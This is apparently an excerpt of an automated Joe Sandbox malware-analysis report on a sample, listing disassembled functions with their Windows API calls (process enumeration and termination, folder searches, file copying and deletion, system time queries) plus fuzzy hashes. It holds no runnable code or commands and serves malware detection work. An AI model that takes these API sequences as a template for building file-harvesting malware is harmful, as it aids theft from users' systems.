Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
Instruction ID: 78af1b154ce8101633b1e4d56c919b12282492ec1c5ab5ccd4ca82fb636fe6c9
Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
Instruction Fuzzy Hash: F53146B5E00258EFDB14DFE4DC49BEDB7B9FF49700F104428E506AA284DB74AA84CB52

Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004194EB

Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
CloseHandle.KERNEL32(00000000), ref: 004195D6

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 396451647-0
Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56

Function 008288E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 00828931
Process32First.KERNEL32(?,00000128), ref: 00828945
Process32Next.KERNEL32(?,00000128), ref: 0082895A

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

CloseHandle.KERNEL32(?), ref: 008289C8

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
Instruction ID: a61c3a9c047c0264a8af3151be329fca8ccb95e68ba6ea3325b1a526cedde641
Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
Instruction Fuzzy Hash: 0D313C71941228EBCB28DF94ED41FEEB7B8FF45700F104199A50AE21A0DB346E84CF92

Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
Process32First.KERNEL32(?,00000128), ref: 004186DE
Process32Next.KERNEL32(?,00000128), ref: 004186F3

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

CloseHandle.KERNEL32(?), ref: 00418761

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
String ID:
API String ID: 1066202413-0
Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5

Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
lstrcatA.KERNEL32(?,00421070), ref: 00414F97
lstrcatA.KERNEL32(?,00899990), ref: 00414FAB
lstrcatA.KERNEL32(?,00421074), ref: 00414FBD

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96

Function 00821A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(00000000,00420DC0), ref: 00821A2C
ExitProcess.KERNEL32 ref: 00821A38
strtok_s.MSVCRT ref: 00821A4F

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID:
API String ID: 3407564107-0
Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
Instruction ID: 854064397952fbefda61d6f10173cf94fa9c0ec018329ed5731c7eb33012bca5
Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
Instruction Fuzzy Hash: 201116B8901219EFCF04DFE4E948AEDBBB9FF14705F108469E906A6250E7706B84CF56

Function 00827BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 00827C17
RtlAllocateHeap.NTDLL(00000000), ref: 00827C1E
GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 00827C2B
wsprintfA.USER32 ref: 00827C5A

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction ID: 82e580cb4543558d6a50017fa7a0529536173f2bf3f45b6bc54b75c0e3b605c2
Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction Fuzzy Hash: FA1139B2944118ABCB14DFDADD45BBEB7F9FB4DB11F10421AF605A2280D3395940CBB1

Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
wsprintfA.USER32 ref: 004179F3

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5

Function 00827C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 00827CCA
RtlAllocateHeap.NTDLL(00000000), ref: 00827CD1
GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 00827CE4
wsprintfA.USER32 ref: 00827D1E

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: Heap$AllocateInformationProcessTimeZonewsprintf
String ID:
API String ID: 3317088062-0
Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction ID: ed80603848179ccb66d2d78340040875a80682154d93aaebc3779225c636e9ef
Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
Instruction Fuzzy Hash: 2F115EB1A45228EFEB208B55DC49FA9B7B8FB05721F10439AE51AE32C0C77459808F51

Function 00823880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,00420F5C), ref: 00823889
StrCmpCA.SHLWAPI(?,00420F60), ref: 008238A3
StrCmpCA.SHLWAPI(?,00420F64), ref: 008238BD
strtok_s.MSVCRT ref: 00823938

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID:
API String ID: 3330995566-0
Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
Instruction ID: 7a6ce9c3f0f852548f1c1caaddfe975579dba9e8cc93b1967f950e9080c80a99
Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
Instruction Fuzzy Hash: 181106B4E00219EFDB14CFE6E958BEEBBB9FB05705F10C029E025AA250D7B89641CF55

Function 00829547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00823D55,80000000,00000003,00000000,00000003,00000080,00000000,?,00823D55,?), ref: 00829563
GetFileSizeEx.KERNEL32(000000FF,00823D55), ref: 00829580
CloseHandle.KERNEL32(000000FF), ref: 0082958E

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID:
API String ID: 1378416451-0
Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction ID: ec5d47f75d3ba5d3560c0bee80d3712a88b9a34465f2ecb21756eb39636dc6aa
Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
Instruction Fuzzy Hash: 8DF01939F40208BBDB20DFA0EC49B9A77BAEB49720F108654FA51A7280D63596418B40

Function 00826D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON

Download Yara Rule

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D31
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00826D4F
CloseHandle.KERNEL32(00000000), ref: 00826D60
Sleep.KERNEL32(00001770), ref: 00826D6B
CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 00826D81
ExitProcess.KERNEL32 ref: 00826D89

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
Instruction ID: 0d36a2049334a0a8ca1aac51ef1be1fd8991aa448b03f055e8d3728f3c274c79
Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
Instruction Fuzzy Hash: 77F03A78A8062DBBE710ABE0EC09BBD7675FF05755F101918B502E5190EBB14580CA57

Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON

Download Yara Rule

Strings

`o@, xrefs: 00406E5E, 00406DD2, 00406E94, 00406EAF, 00406DAE

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID:
String ID: `o@
API String ID: 0-590292170
Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95

Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
lstrcatA.KERNEL32(?,008C9C00), ref: 00414C08

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92

Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
Part of subcall function 00414910: lstrcatA.KERNEL32(?,008CADE0,?,000003E8), ref: 00414A4A
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31

Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07

Strings

UaA, xrefs: 00414C2F, 00414C64, 00414C9A, 00414CCF, 00414D05, 00414D3A, 00414D5F, 00414C32, 00414C67, 00414C9D, 00414CD2, 00414D08, 00414D3D

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: UaA
API String ID: 2104210347-3893042857
Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6

Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

GetSystemTime.KERNEL32(?,008948D0,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86

Strings

cI@, xrefs: 00418B6C, 00418BE5, 00418BF0, 00418C04, 00418BD3, 00418BF3
cI@, xrefs: 00418BB1, 00418BE1, 00418BE4

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: SystemTimelstrcpy
String ID: cI@$cI@
API String ID: 62757014-1697673767
Opcode ID: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
Instruction ID: 15f3dfc6f8d56a301bf8b2a7a9260479b6db203ca669f730be279af5ebf73ee3
Opcode Fuzzy Hash: 728e3afec194442a0a20c9b4cf47b2a0a0f7365ad80767aaeb7a96b2b5f46ac6
Instruction Fuzzy Hash: 7111E971D00008AFCB04EFA9C8919EE77B9EF58314F04C05EF01667241DF38AA86CBA6

Function 00415050 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 0041508A
lstrcatA.KERNEL32(?,008C9568), ref: 004150A8

Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943

Strings

aA, xrefs: 004150CF, 004150F4, 004150D2

Memory Dump Source

Source File: 00000000.00000002.2240797989.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2240797989.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2240797989.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$FileFindFirstFolderPathwsprintf
String ID: aA
API String ID: 2699682494-2567749500
Opcode ID: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
Instruction ID: 27646669aa04729862e240b26620d37997e147c17b59a732ce93ef494e7ce50b
Opcode Fuzzy Hash: d64dcdbc5a5b078ecf4a674937750308087945107cc9d2085dbcd85f67f2e6ce
Instruction Fuzzy Hash: B801D6BAA4020877C714FBB0DC42EEE333CAB55304F00415DB68A570D1EE789AC88BA6

Function 0081BCE7 Relevance: 5.3, APIs: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0082A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 0082A9EF

Part of subcall function 0082AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 0082AC2C
Part of subcall function 0082AC17: lstrcpy.KERNEL32(00000000), ref: 0082AC6B
Part of subcall function 0082AC17: lstrcat.KERNEL32(00000000,00000000), ref: 0082AC79

Part of subcall function 0082AB87: lstrcpy.KERNEL32(00000000,?), ref: 0082ABD9
Part of subcall function 0082AB87: lstrcat.KERNEL32(00000000), ref: 0082ABE9

Part of subcall function 0082AB07: lstrcpy.KERNEL32(?,00420E17), ref: 0082AB6C

Part of subcall function 0082AA07: lstrcpy.KERNEL32(?,00000000), ref: 0082AA4D

Part of subcall function 0081A077: memcmp.MSVCRT(?,00421264,00000003), ref: 0081A094

lstrlen.KERNEL32(00000000), ref: 0081BF06

Part of subcall function 00829097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 008290B9

StrStrA.SHLWAPI(00000000,004213E0), ref: 0081BF34
lstrlen.KERNEL32(00000000), ref: 0081C00C
lstrlen.KERNEL32(00000000), ref: 0081C020

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
String ID:
API String ID: 1440504306-0
Opcode ID: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
Instruction ID: 4e1800f20d41b9eea4f40b7b0a9363257efd4db51d368f3cd98d4d0b1699972d
Opcode Fuzzy Hash: 9e08ee45ebc43fe706c0c8ad989736c962bf943befa7584f1b5ac42d019a3d06
Instruction Fuzzy Hash: 7DB1FC75910228EBCF18EBA4ED96EED7379FF54700F404169B506E2491EE346A88CF63

Function 008251A7 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00829047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00829072

lstrcat.KERNEL32(?,00000000), ref: 008251E1
lstrcat.KERNEL32(?,00421070), ref: 008251FE
lstrcat.KERNEL32(?,0064A5F8), ref: 00825212
lstrcat.KERNEL32(?,00421074), ref: 00825224

Part of subcall function 00824B77: wsprintfA.USER32 ref: 00824B93
Part of subcall function 00824B77: FindFirstFileA.KERNEL32(?,?), ref: 00824BAA

Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00824BD8
Part of subcall function 00824B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00824BEE
Part of subcall function 00824B77: FindNextFileA.KERNEL32(000000FF,?), ref: 00824DE4
Part of subcall function 00824B77: FindClose.KERNEL32(000000FF), ref: 00824DF9

Memory Dump Source

Source File: 00000000.00000002.2241071861.0000000000810000.00000040.00001000.00020000.00000000.sdmp, Offset: 00810000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_uCEeVGAWIB.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
String ID:
API String ID: 2667927680-0
Opcode ID: fea607eff97497eb4fd5309f6b34a87d5e7f8ff3753410a5b2e417b1bb1efa56
